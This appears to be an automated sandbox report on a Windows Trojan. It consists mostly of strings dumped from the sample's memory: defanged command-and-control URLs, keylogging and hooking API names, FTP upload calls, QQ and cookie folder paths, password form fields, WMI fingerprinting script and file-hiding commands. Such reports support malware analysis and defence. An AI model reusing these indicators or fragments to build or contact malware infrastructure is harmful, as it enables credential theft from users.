HTTP/1.1 301 Moved Permanently

Server: openresty

Date: Wed, 05 Oct 2016 23:17:05 GMT

Content-Type: text/html

Content-Length: 178

Connection: keep-alive

Location: hXXp://VVV.so.com/s?q=aaaçŸä¿¡è½°ç‚¸æœº

<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>....

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

%original file name%.exe_1460:

.text

`.rdata

@.data

.rsrc

t%SVh

t$(SSh

~%UVW

u$SShe

exdui.dll

gdiplus.dll

kernel32.dll

GdiPlus.dll

Kernel32.dll

user32.dll

Ole32.dll

OleAut32.dll

User32.dll

advapi32.dll

ole32.dll

shlwapi.dll

wininet.dll

Psapi.dll

ntdll.dll

Wininet.dll

advpack.dll

Powrprof.dll

gdi32.dll

Gdi32.dll

shell32.dll

imm32.dll

dbghelp.dll

oleaut32.dll

MsgWaitForMultipleObjects

HttpOpenRequestA

HttpSendRequestA

HttpQueryInfoA

ExitWindowsEx

EnumChildWindows

keybd_event

InternetOpenUrlA

ShellExecuteA

GetProcessHeap

SetThreadExecutionState

GetAsyncKeyState

GdipSetStringFormatHotkeyPrefix

RegisterHotKey

UnregisterHotKey

FtpCreateDirectoryA

FtpRemoveDirectoryA

FtpGetFileA

FtpFindFirstFileA

FtpSetCurrentDirectoryA

FtpGetCurrentDirectoryA

FtpDeleteFileA

FtpRenameFileA

FtpPutFileA

FtpOpenFileA

FtpGetFileSize

mg.LJ

AOC:\Windows\System\MemorandumList.txt

C:\Windows\System\background_image_main.jpg

.cxy8sx9

18,43,43,87,

54,11,24,

Set WMI =GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_VideoController")

GetTrait ="1:"&Obj.Caption&" 2:"&Obj.AdapterRAM&" 3:"&Obj.VideoProcessor

Set WMI =GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_OperatingSystem")

GetTrait = "[t]"&Obj.InstallDate&"[t][s]"&round(Obj.TotalVisibleMemorySize/1024,0)&"MB[s]"

MsgBox

SysShadow.SubWnd

iTXtXML:com.adobe.xmp

" id="W5M0MpCehiHzreSzNTczkc9d"?> #

[ip_url_s]

WinHttp.WinHttpRequest.5.1

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.10 Safari/537.36

Content-Type: application/x-www-form-urlencoded

hXXp://VVV.db-ha.com/tool/get_date.php

hXXp://cgi.im.qq.com/cgi-bin/cgi_svrtime

hXXp://time.dxhz.vip/

hXXp://time.aaa-info.vip/

hXXp://VVV.v-update.com/t.php

hXXp://VVV.b-update.com/t.php

/best_house.php

&userKey=

115645421

13132132

!**[/]*?

[qxmurl]

[ipUrl]

[phone_num_url]

[ymzq_url]

/synchronous/synchronous.php

https

Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.10 Safari/537.36

http=

HTTP/1.1

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

hXXps://

hXXp://

hXXp://71809.vhost29.boxcdn.cn/TeaManager.html

hXXp://1.musql.sinaapp.com/tool/sendBug.php

&key_2=

sos=1&key_1=

[url]

\aaafz.ini

1999-09-09 19:19:19

hXXp://VVV.db-ha.com/

hXXp://VVV.v-update.com/

hXXp://VVV.l-last.win/

hXXp://VVV.l-loan.loan

hXXp://VVV.l-last.win/

hXXp://VVV.aaa-info.vip/

hXXp://VVV.z-win.win/

[back_url]

[skype_url]

[admin_url]

[xmlHttp_GetInfo]

[xmlHttp_AddCode]

[http-s]

[http-l]

[qiangz_url]

hXXp://site.dxhz.vip/

[emsg]

[msg]

hXXp://sysboom.duapp.com/music/url.txt

hXXp://sysboom.duapp.com

@1970-01-01 08:00:00

application/x-www-form-urlencoded

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cookies

\*.txt

&key=

open_url_lalala_w

\Tencent\QQ\Misc\*.*

/Mail.php

\host_ip.txt

*.txt

|*.txt

User-Agent: Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.0; MyIE2; .NET CLR 1.1.4322)

aaafz.ini

_en.exe

%WinDir%\

TStdHttpAnalyzerForm

%f%%f

7".Fv

>.OsM

r.vDO

,uy.vj

.z[.Rtp

qiTXtXML:com.adobe.xmp

" id="W5M0MpCehiHzreSzNTczkc9d"?>

!iTXtXML:com.adobe.xmp

" id="W5M0MpCehiHzreSzNTczkc9d"?>

"iTXtXML:com.adobe.xmp

" id="W5M0MpCehiHzreSzNTczkc9d"?> G7

iTXtXML:com.adobe.xmp

" id="W5M0MpCehiHzreSzNTczkc9d"?>

c-V}Sk^

.pNA$ }C

ImageMagick 6.8.8-7 Q16 x86_64 2014-02-28 hXXp://VVV.imagemagick.orgY

1398346191

file:///home/ftp/1520/easyicon.cn/easyicon.cn/cdn-img.easyicon.cn/png/11495/1149545.png

" id="W5M0MpCehiHzreSzNTczkc9d"?>

:15.0.0.0:80

:1.0.0.0:8

:*.*.*.*:**

[1][0-9]{10}

hXXp://m.ip138.com/mobile.asp?mobile=

" id="W5M0MpCehiHzreSzNTczkc9d"?> 0@z$

" id="W5M0MpCehiHzreSzNTczkc9d"?> *b)

" id="W5M0MpCehiHzreSzNTczkc9d"?>

>i!M.".eH/;

" id="W5M0MpCehiHzreSzNTczkc9d"?> =J,6

" id="W5M0MpCehiHzreSzNTczkc9d"?>

1Kw%C

hXXp://VVV.baidu.com/s?wd=

\historyRecord.txt

.IDATx

function time(){return Math.random()}

/new_par/isonLine.php

/UserFriedManager.php

hXXps://VVV.baidu.com/s?wd=

\exdui.dll

C:\Windows\System\exdui.dll

z.vkDL"

Riched20.dll

Microsoft.XMLDOM

number is %d.

:"%s"

%:.NG2r8%4/h

KERNEL32.DLL

ADVAPI32.dll

ATL.DLL

GDI32.dll

MSVCRT.dll

OLEAUT32.dll

SHELL32.dll

SHLWAPI.dll

USER32.dll

cmd /c attrib s a h r

cmd /c

/user_string/get.php?u=

/sendEmail/SendIsNew.php

%WinDir%\aaafz_begin.bat

/user_string/add.php

/UserHelper/xmlHttp_AddCode.php

http:

" id="W5M0MpCehiHzreSzNTczkc9d"?> "v

/UserHelper/xmlHttp_GetInfo.php

/UserHelper/xmlHttp_SetUserInfo.php

hXXp://api.ysdm.net/register.xml

hXXp://api.ysdm.net/info.xml

hXXp://api.ysdm.net/recharge.xml

hXXp://api.ysdm.net/create.xml

hXXp://api.ysdm.net/reporterror.xml

crText

Report

themepassword

SysShadow.HostWnd

dwmapi.dll

{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}

VBScript.RegExp

PasswordChar

crTextSel

SysShadow.Menu

fiTXtXML:com.adobe.xmp

" id="W5M0MpCehiHzreSzNTczkc9d"?> _

" id="W5M0MpCehiHzreSzNTczkc9d"?> $GK

&password=

&softkey=

Content-Disposition: form-data; name="password"

{pass}

Content-Disposition: form-data; name="softkey"

{softkey}

Content-Disposition: form-data; name="image"; filename="System.Byte[]"

SetClientCertificate

Login

%d&&'

123456789

00003333

?456789:;

!"#$%&'()* ,-./0123

Q%*.*f

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

__MSVCRT_HEAP_SELECT

Broken pipe

Inappropriate I/O control operation

Operation not permitted

iphlpapi.dll

MPR.dll

WINMM.dll

WS2_32.dll

VERSION.dll

RASAPI32.dll

RPCRT4.dll

WinExec

GetWindowsDirectoryA

KERNEL32.dll

GetKeyState

GetViewportOrgEx

WINSPOOL.DRV

RegCloseKey

RegOpenKeyExA

RegCreateKeyA

RegCreateKeyExA

COMCTL32.dll

WSOCK32.dll

InternetCrackUrlA

InternetCanonicalizeUrlA

WININET.dll

GetCPInfo

CreateDialogIndirectParamA

UnhookWindowsHookEx

SetWindowsHookExA

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

GetViewportExtEx

comdlg32.dll

.PAVCException@@

Shell32.dll

Mpr.dll

Advapi32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

.PAVCFileException@@

: %d]

(*.*)|*.*||

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|PNG

(*.PNG)|*.PNG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

\\.\Scsi0:

\\.\PhysicalDrive0

%s:%d

windows

.PAVCNotSupportedException@@

out.prn

(*.prn)|*.prn|

%d.%d

%d/%d

1.6.9

unsupported zlib version

png_read_image: unsupported transformation

%d / %d

Bogus message code %d

libpng error: %s

libpng warning: %s

1.1.3

bad keyword

libpng does not support gamma background rgb_to_gray

Palette is NULL in indexed image

(%d-%d):

%ld%c

VVV.dywt.com.cn

;3 #>6.&

'2, / 0&7!4-)1#

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

HTTP/1.0

%s

Reply-To: %s

From: %s

To: %s

Subject: %s

Date: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

SMTP

window %s handle %d

play %s from %d

play %s

status %s position

close %s

Bag pipe

%d%d%d

rundll32.exe shell32.dll,

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCArchiveException@@

zcÁ

right-curly-bracket

left-curly-bracket

0123456789

The URL has moved here

"hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

c:\%original file name%.exe

#include "l.chs\afxres.rc" // Standard components

1.0.0.0

(*.*)

2.3.1.3

%original file name%.exe_1460_rwx_00E20000_00013000:

.text

`.rdata

@.data

.rsrc

@.reloc

1.2.3

%c%c%c%c%c%c%c%c%c%c

MSVCRT.dll

KERNEL32.dll

zlib1.dll

!"#$%&'()* ,-./012

DLL support by Alessandro Iacopetti & Gilles Vollant

%original file name%.exe_1460_rwx_10001000_0002C000:

f9z.vk

Riched20.dll

Riched32.dll

{00000000-0000-0000-C000-000000000046}

{34A715A0-6587-11D0-924A-0020AFC7AC4D}

Microsoft.XMLDOM

z>Advapi32.dll

advapi32.dll

kernel32.dll

ntdll.dll

user32.dll

gdi32.dll

ole32.dll

Ole32.dll

shell32.dll

atl.dll

GdiPlus.dll

GetProcessHeap

program internal error number is %d.

:"%s"

:"%s".

%:.NG2r8%4/h

.text

`.rdata

@.data

.rsrc

.reloc

number is %d.

Summary

Dynamic Analysis

Removals

Static Analysis

Network Activity

Map

Strings from Dumps